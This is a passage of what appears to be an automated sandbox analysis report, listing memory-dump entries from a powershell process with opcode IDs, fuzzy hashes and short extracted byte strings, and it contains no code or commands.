                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ff3f4a7f7fe6d5e809cca256bccab40c6d5de4b77e6dc233f767e3fa5190314d
                                            • Instruction ID: 508ea6ab92515ef4061f1abb37578bd6fadffb1ee2f9b57c9edbd88b51514168
                                            • Opcode Fuzzy Hash: ff3f4a7f7fe6d5e809cca256bccab40c6d5de4b77e6dc233f767e3fa5190314d
                                            • Instruction Fuzzy Hash: B9E1F674A00219AFDB14DFA8D494AADFBF2FF48310F248569E815AB361C731ED81CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d65053e4883cb727cf6dad1051e945926ebf175035844bd141aa2823916d5af7
                                            • Instruction ID: 08352bf9c81d9279cebba0c7af84d3d814b5e5953f81dd75c3098960684179bd
                                            • Opcode Fuzzy Hash: d65053e4883cb727cf6dad1051e945926ebf175035844bd141aa2823916d5af7
                                            • Instruction Fuzzy Hash: 64B186B0E00209CFDF10DFA9D8857DEBBF2AF88314F148569D814E7264E774A985CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e26281fe22b32f07ecf1250f35f182487043abd760694468ae93f1f205271c9
                                            • Instruction ID: a6cfb340fb41af628318e4b8f430c21b5054ae8c2398873165cfdc8960d48977
                                            • Opcode Fuzzy Hash: 5e26281fe22b32f07ecf1250f35f182487043abd760694468ae93f1f205271c9
                                            • Instruction Fuzzy Hash: CF51C130A052499FCB05CF98C894AEEBBB2FF49310F158195E850EB3A6D735ED51CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6b114b922f5695de5204df0a360e820ccd39156ad629c39dc190ab3e4aefd936
                                            • Instruction ID: 033f7841ce2f8e3529cffc04d35b80bd63a3bd98861db55aeb180f375fec3972
                                            • Opcode Fuzzy Hash: 6b114b922f5695de5204df0a360e820ccd39156ad629c39dc190ab3e4aefd936
                                            • Instruction Fuzzy Hash: 0A518D74A002098FCB14DF58C4909AEFBB6FF88310F2485A9E846AB364D731ED51CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65d7141e1274fb260972d5dfb31bc0ec39f3774427aaed07cb3b9f000c24ba9d
                                            • Instruction ID: 915b7cb87cef57b0e4bdc4d9026b1c8bd7073e6aa45de841668302e52caebb45
                                            • Opcode Fuzzy Hash: 65d7141e1274fb260972d5dfb31bc0ec39f3774427aaed07cb3b9f000c24ba9d
                                            • Instruction Fuzzy Hash: DF414F34A006098FCB15CF98C994ABEB7B2FF88310B248158E855AB3A5C735ED51CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c4774fb6aca1a2a92dd9b0e5180c6c7eb755714bb5addcaeedcffb73a3695a5
                                            • Instruction ID: a8d5a839f8991ffc4a015d9dc1fd2411611137ce257cd344811dad87e3b97831
                                            • Opcode Fuzzy Hash: 0c4774fb6aca1a2a92dd9b0e5180c6c7eb755714bb5addcaeedcffb73a3695a5
                                            • Instruction Fuzzy Hash: 26414C74A00209DFDB15CF98C4849AEF7B2FF88310B24856AE845A73A5D731ED91CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1fdb462dd6ca799dfb67693cc527593a34c17e26a56cd38b4a1d2f29c114c84
                                            • Instruction ID: 78f7e6b73753313f0bf59173be986699cf3bf252e850fec7377444838582560e
                                            • Opcode Fuzzy Hash: b1fdb462dd6ca799dfb67693cc527593a34c17e26a56cd38b4a1d2f29c114c84
                                            • Instruction Fuzzy Hash: 1A418E30A05745DFCB16CF68C4949A9FBB1FF4A310B1945DAD845DB762C335AC81CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27973800b41cb839f3aea4f7140b843154f7227f784de7582ba69ba3d2574f4f
                                            • Instruction ID: c2374eb80bb6023418470d9c80bb4a16b4b165ee7547dd0544bd2b53beceddc8
                                            • Opcode Fuzzy Hash: 27973800b41cb839f3aea4f7140b843154f7227f784de7582ba69ba3d2574f4f
                                            • Instruction Fuzzy Hash: D0318278B00218AFE70897A4C851FBE76A3DF84754F10C065EA416F391DEB69C468B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c18eab59a24e4feee56a909d8e453fcbe0a02de1b75cbf125d8c5fd1fb671c50
                                            • Instruction ID: 5b80c98800792752a85c0920d5ee78df917d83129fe78ff6155ecaf99fbc9e7d
                                            • Opcode Fuzzy Hash: c18eab59a24e4feee56a909d8e453fcbe0a02de1b75cbf125d8c5fd1fb671c50
                                            • Instruction Fuzzy Hash: 84411874A00209CFDB14CF98C484AAEFBB2FF88310F248669E845A7364D731ED91CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f32b80dfd4b7dfdc4ddeb50be323b3c1a3360b69dd76bc928e325cfefaba084
                                            • Instruction ID: f0f531cbe5e309afc7979ba8213814358b0d2de1635d222b2ae37444fb62462d
                                            • Opcode Fuzzy Hash: 7f32b80dfd4b7dfdc4ddeb50be323b3c1a3360b69dd76bc928e325cfefaba084
                                            • Instruction Fuzzy Hash: 0B310A74A006059FCB14CF58C5809AEF7F2FF48310B248698E919A77A5C731FD91CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2fc3685913bec8603ad252b45ee83dc63e7a02944795de90a719103a0e86921
                                            • Instruction ID: a7fd25ee9647f1ca2dfb3d6fbbc0b16f0db5469d6b72a52030046664fd578198
                                            • Opcode Fuzzy Hash: e2fc3685913bec8603ad252b45ee83dc63e7a02944795de90a719103a0e86921
                                            • Instruction Fuzzy Hash: FF31F6B4A006059FCB14CF58C580AAEF7F2FF88310B2486A8E859A7765C731FD91CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b23be1159f58e1573b2d436320fc9d4c04aacfccd59c6b21d1e13e10b8bbe26
                                            • Instruction ID: 7c67700c5ef97bbfc0113ad4d9e87d07d72f996b208865149ef1d3e0ce9d5591
                                            • Opcode Fuzzy Hash: 4b23be1159f58e1573b2d436320fc9d4c04aacfccd59c6b21d1e13e10b8bbe26
                                            • Instruction Fuzzy Hash: 8431F6B5A00609CFCB14CF48C584AADF7B2FF88310B2586A9D945AB365C732FD91CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6a6a106b58b399b35e4b73929e4ca2d9ad616530bd57b7320d93169b82424908
                                            • Instruction ID: ce66970e6a60a53a6c9e797079487010b06b3fe8c3a70413dee4ced26b1a3635
                                            • Opcode Fuzzy Hash: 6a6a106b58b399b35e4b73929e4ca2d9ad616530bd57b7320d93169b82424908
                                            • Instruction Fuzzy Hash: 0F214274A042559FCB00DF99D88096EBBB5FF89310B15819AE815EB362C734FD41CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec9a4cbdc7067546b48e0ab075b27e09212d72852b0d3f29cbf3a369a50b0d27
                                            • Instruction ID: 1a9a2b61d65f80e0fb0d76f1436f7aea522f14f8f6bcbcf776e4d8ae16d71399
                                            • Opcode Fuzzy Hash: ec9a4cbdc7067546b48e0ab075b27e09212d72852b0d3f29cbf3a369a50b0d27
                                            • Instruction Fuzzy Hash: B8210074A006099FCB00DF99D880AAEFBF5FF89310B148569E919AB352D731FD41CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083394778.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_338d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 315f3d1c0cd40637dde249439565ad3eee0b6fadd68935750df33e4d1b9b1445
                                            • Instruction ID: 0a8562236cbfe77d6b8df21f5e2c3b65644aec3d9f4a998efe241e1c4af4e296
                                            • Opcode Fuzzy Hash: 315f3d1c0cd40637dde249439565ad3eee0b6fadd68935750df33e4d1b9b1445
                                            • Instruction Fuzzy Hash: 2E01F2B15083449BE720EB25CCC4B66FF9CEF41224F18816AEC880B6C2D27D9945CAB2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083394778.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_338d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8a88ebe2482b444f7ac7e29bd8b00c49411a3cc5697baa79e8b6c2c8a888346
                                            • Instruction ID: 4044c8d106ec7eb4389e9dec039222788f8310459213dfaf56584ffb7c5e2529
                                            • Opcode Fuzzy Hash: a8a88ebe2482b444f7ac7e29bd8b00c49411a3cc5697baa79e8b6c2c8a888346
                                            • Instruction Fuzzy Hash: 8D01006250D3C45FD7128B258C94B52BFB8DF53224F1D81DBD9949F2D3C2695848CB72
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: affdb549818d3329465c2c58ddaf0f5b7ce3564b23bb6eb46d33acdfd0d8366e
                                            • Instruction ID: be0f9fc500d0a47a27848fb6565c730096d93c75abded6d19e468d1fe1813825
                                            • Opcode Fuzzy Hash: affdb549818d3329465c2c58ddaf0f5b7ce3564b23bb6eb46d33acdfd0d8366e
                                            • Instruction Fuzzy Hash: 8BF09031B001059BCB14CB98D984AADF3B2FFC8320B2482A9D855A76A0CB36AD52CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2153ca38ed6424222b22350f0c8bf7d08c412b4f4cb4f024494bad6be6fd555e
                                            • Instruction ID: a24b0fac85e374c23555e0284c54516a2381dd43dfeadbfb2849dcca6fe5007a
                                            • Opcode Fuzzy Hash: 2153ca38ed6424222b22350f0c8bf7d08c412b4f4cb4f024494bad6be6fd555e
                                            • Instruction Fuzzy Hash: 73F059F72092824FE721BB6498955F2FF70EBC7210B1884DBD846CF1B3D6A18426CB42
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7eca94565356b301cb5a0e9b8fe058d38dcd1fdf4fcb7e47636ee91f3d7da2cc
                                            • Instruction ID: 79898655414210d55fc96f1733765920c33cf7502800733a30e659b8dbc71364
                                            • Opcode Fuzzy Hash: 7eca94565356b301cb5a0e9b8fe058d38dcd1fdf4fcb7e47636ee91f3d7da2cc
                                            • Instruction Fuzzy Hash: D1F0B735A001099FDB14CF99D890AEEF7B1FF88324F208159E915A72A1C732E962CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5e6cce73bece55a73f4952e8967095d255e471c0088993460c99939add6e432
                                            • Instruction ID: 3b210afb2040a0e581e8540a58b86136fbb54af9fe5bca53d19f296cbc00865d
                                            • Opcode Fuzzy Hash: a5e6cce73bece55a73f4952e8967095d255e471c0088993460c99939add6e432
                                            • Instruction Fuzzy Hash: C3E0DFB6204210CFF6389A28B1400BBB3A1FBC4725B2089AEC88623640CAB1AC42CA45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb47df3d4dd0b0f8087727c700961127a0244589e295a1694c824c7a72dddc5c
                                            • Instruction ID: 0acabf50caae563bbd912991ba1dc32110b29f3a1425264f53143b7d444a2d1a
                                            • Opcode Fuzzy Hash: bb47df3d4dd0b0f8087727c700961127a0244589e295a1694c824c7a72dddc5c
                                            • Instruction Fuzzy Hash: BDE0D1F4204145EBD779D664C4416E1F7B2EF95110758C0DDD8494F143DEE6D943CB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083796189.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_4c50000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a96e973da16e110d8f697bbb3e11cdd2faed97ef29df56c4c0e418c6e5758b63
                                            • Instruction ID: 3ae0c836c96ca6196f04d98c4f340cda386af45a7d907660076d673cfddadb60
                                            • Opcode Fuzzy Hash: a96e973da16e110d8f697bbb3e11cdd2faed97ef29df56c4c0e418c6e5758b63
                                            • Instruction Fuzzy Hash: F7D01739B001049FDB00CB88D8909EDF371FB88324F10806AD91893351CB32AC12CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c577ee962ddef5ff6cedf18e3753124ac142d17a0b1948a7da97b9e6dd7f0b5
                                            • Instruction ID: dacbb5ee35feabad6997dab8bfeb08aba44842d0b5eba79d69ec6a49981d3cb5
                                            • Opcode Fuzzy Hash: 5c577ee962ddef5ff6cedf18e3753124ac142d17a0b1948a7da97b9e6dd7f0b5
                                            • Instruction Fuzzy Hash: 81D05EF6600011DBE768CB04C9A1AF4F371FBC6201BA481E9E8464F2C4CFE5A902CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20083394778.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_338d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c88a14455cd5ec066b8d1349db9afe23383499408a3bf4a935faf79b28fc88a
                                            • Instruction ID: 660e91b91f652b395184f32c2386b13f534eda24b66a353cd2c972d1cc2535a2
                                            • Opcode Fuzzy Hash: 0c88a14455cd5ec066b8d1349db9afe23383499408a3bf4a935faf79b28fc88a
                                            • Instruction Fuzzy Hash: 382136B6604340EFD702FF18D9C4B2ABBA9FB84224F248979E4094B681C375D806C6A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl
                                            • API String ID: 0-2901279966
                                            • Opcode ID: 60cde73891928379228756c1cd5c03c4f3921b9d86b599cdefe619e6f9d2a8ac
                                            • Instruction ID: ca957eff63f45ba47b767d629a97f2ef59b1dc5be0233e12ea6c32db5cf47491
                                            • Opcode Fuzzy Hash: 60cde73891928379228756c1cd5c03c4f3921b9d86b599cdefe619e6f9d2a8ac
                                            • Instruction Fuzzy Hash: 1EF17CB8B00206DFE724CB64C451ABAB7F2EF89314F1485A9D915AB744CBB5EC42CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4[Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl
                                            • API String ID: 0-137000097
                                            • Opcode ID: d4420d7267200a9df9cd875f2f58628a35a4cd61cef93b6ff898e0937157dd27
                                            • Instruction ID: 8d9ff6ff873942c83b294d8738fc2e0de0d507647b8fc5a6b574a9117bd4dc1f
                                            • Opcode Fuzzy Hash: d4420d7267200a9df9cd875f2f58628a35a4cd61cef93b6ff898e0937157dd27
                                            • Instruction Fuzzy Hash: 36E17FB4F002059BE724DBA4C852FAEB7A2EF84704F14C469E905AF794CBB5AC41CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$ Al$4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl
                                            • API String ID: 0-1881228815
                                            • Opcode ID: 07e8ee646409675af04b7c66afc029c999eae4969600fa6c85b92de245203b2f
                                            • Instruction ID: 18ee116381b01de26bfba66508f03fa607f9e94f7d2fde4109584a7e528c6e36
                                            • Opcode Fuzzy Hash: 07e8ee646409675af04b7c66afc029c999eae4969600fa6c85b92de245203b2f
                                            • Instruction Fuzzy Hash: 6A713FB4B002059BE724CB55C455EAABBF2EF89314F14C1AAE905AB354DFB1DC41CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,|?l$,|?l$P0@l$P0@l$P0@l$P0@l$GBl$GBl
                                            • API String ID: 0-1700991236
                                            • Opcode ID: f2bf6896a3e20c00ba4191e46d2536daa088d6a3d0ca08d6c1dd6a64515153e8
                                            • Instruction ID: 5f8f47171df00d3124c64d6bfb348e643b0a6ea3911a66250b801d6937c41558
                                            • Opcode Fuzzy Hash: f2bf6896a3e20c00ba4191e46d2536daa088d6a3d0ca08d6c1dd6a64515153e8
                                            • Instruction Fuzzy Hash: 1BA1C3B1700216DBEB34CB65C950BBAB7A2EF85210F5484E9EE41AB291CBB1EC41CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$ Al$4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-1779603946
                                            • Opcode ID: 023789970d1a12ed494ad4501e1b5318dc0ac5cf295f4d29f97fea2199fffb17
                                            • Instruction ID: b47bab3001bd30e2704536f4649e67ad781885e0cd050a9b2ddd9a4da5d24e5d
                                            • Opcode Fuzzy Hash: 023789970d1a12ed494ad4501e1b5318dc0ac5cf295f4d29f97fea2199fffb17
                                            • Instruction Fuzzy Hash: 209139B4A00205DFEB64DB58C595EE9B7F2EF88314F1480A9E905AB365CBB2EC41CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4\Bl$4\Bl$@bBl$@bBl$@bBl$@bBl$L?l$L?l
                                            • API String ID: 0-660248596
                                            • Opcode ID: beb009f18806c3fd221c62447db577f80a977bbc8151a4be14c7cb1a1d70f0c3
                                            • Instruction ID: 987b715e443965eb40d4f4c6d2b30fd04c16ad30ff7b4ce2570b244db71c8283
                                            • Opcode Fuzzy Hash: beb009f18806c3fd221c62447db577f80a977bbc8151a4be14c7cb1a1d70f0c3
                                            • Instruction Fuzzy Hash: FF6180B4B102059BE724CB58C491FBAB7F2EFC9314F1484A9E805AB355CBB9EC41CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4\Bl$4\Bl$4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-1528557622
                                            • Opcode ID: ff343f89e4dee349da80466c711c34a9affa2ed01f8ed9db45278a33eed0526d
                                            • Instruction ID: 69ee22927e56969c08ab93ca13578a99bcf9466b06b97cc0d41456da2b543f33
                                            • Opcode Fuzzy Hash: ff343f89e4dee349da80466c711c34a9affa2ed01f8ed9db45278a33eed0526d
                                            • Instruction Fuzzy Hash: EFD13BF9B00206DBEB24CF54C981AA9B7B2FF89314F1485A9DD15AB744C77AE841CF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20097290183.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_9090000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P0@l$P0@l$P0@l$P0@l$GBl$GBl
                                            • API String ID: 0-10428318
                                            • Opcode ID: 8c4613789c87e84d9fda574853b3e4d70cae4cbb03d1539d365dd53261f6a28c
                                            • Instruction ID: de60d6409254982009ba688a620f343fda1fdb0a1c638a33741c4ea91f37f798
                                            • Opcode Fuzzy Hash: 8c4613789c87e84d9fda574853b3e4d70cae4cbb03d1539d365dd53261f6a28c
                                            • Instruction Fuzzy Hash: BDC19A35B10209AFDF64CE5CD950BAAB7E2BF84350F148869F921AB394CB31DC42DB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-3364196783
                                            • Opcode ID: c140686a7a621b642076d7f6659dbac007e30f67bf322df80d220810789d6c1c
                                            • Instruction ID: 16f99deb51833eaeed0b01c0098d53b8fc78894e7bf48f068aca0858c2caa3d6
                                            • Opcode Fuzzy Hash: c140686a7a621b642076d7f6659dbac007e30f67bf322df80d220810789d6c1c
                                            • Instruction Fuzzy Hash: 20C18BF4E003059BEB24DB94C851FAAB7B2EF84704F14C469E9016B754CBB6A846CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
